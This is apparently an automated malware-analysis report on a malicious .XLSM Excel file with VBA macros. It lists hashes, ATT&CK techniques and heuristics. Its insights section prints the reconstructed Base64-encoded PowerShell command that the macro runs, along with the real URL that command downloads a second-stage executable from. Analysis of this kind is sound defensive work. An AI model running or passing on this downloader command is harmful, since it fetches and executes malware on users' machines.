Office (OOXML) / .XLSM malware analysis — malicious · bfd6471c354eefa9

MALICIOUS

Office (OOXML) / .XLSM

363.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300

MD5: c2a6a00cae217186b812487684f843a0 SHA-1: 53579f8e6aed1a15fe57351795cfe4044fa21724 SHA-256: bfd6471c354eefa96fa3e5a26d83444463b8b4ec3ae6eb7630a02ef14f45a75e

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The critical heuristic OLE_VBA_SHELL indicates the presence of a Shell() call within the VBA macro. The macro constructs a PowerShell command that downloads a second-stage executable from 'http://3.64.251.13/y/2/3452201036236.exe' and then executes it. This PowerShell command is obfuscated using Base64 encoding. The reconstructed command is 'powershell -win 1 -enc JABQAHIAbwB...YwByAG0ALgBlAHgAZQAiACsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATAB5AHMAdABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaQB0AHQAcAA6AC8ALwAzAC4ANgA0AC4AMgA1ADEALgAxADMAOQAvAHkALwAyAC8AMwA0ADUAMgAyADAAMQAwADMANgAyAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABQAHIAaQBvAGMAbgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABQAHIAaQBvAGMAbgBhAG0AZQAiACk='. This indicates a downloader or droppper functionality.

Heuristics 2

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA project inside OOXML medium OOXML_VBA

Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `3ce37ef85bc679c0bb9e105396651039eb2254d55716b93665995b6b63b257d4`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2540 bytes
`vbaProject_00.bin` `cf8d16a88e6a0bf6f5bdc2bdafec9199a28511a727e04e76c16f4189d69d4b1e`	vba-project	OOXML VBA project: xl/vbaProject.bin	6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.